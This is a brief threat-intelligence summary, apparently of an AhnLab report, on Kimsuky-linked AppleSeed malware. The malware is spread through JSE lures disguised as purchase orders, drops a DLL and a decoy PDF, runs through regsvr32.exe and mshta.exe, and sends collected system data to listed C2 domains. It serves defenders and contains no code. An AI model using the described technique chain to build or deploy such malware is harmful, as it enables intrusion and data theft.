AhnLab observed AppleSeed malware being distributed in files disguised as purchase orders and approval documents, with the backdoor identified as a tool mainly used by the Kimsuky group. The JSE lure drops both an AppleSeed DLL and a decoy purchase-order PDF under %ProgramData%, then uses regsvr32.exe to decode and run the backdoor and mshta.exe to download and execute an additional script. The script collects host, OS, processor, memory, network, routing, port, ARP, process, service, ProgramFiles, Start Menu, and recent-file information before sending it to C2. The report lists C2 infrastructure including dirwear.000webhostapp.com for information theft and gerter.getenjoyment.net for the AppleSeed backdoor, and warns that the decoy document can hide infection from users.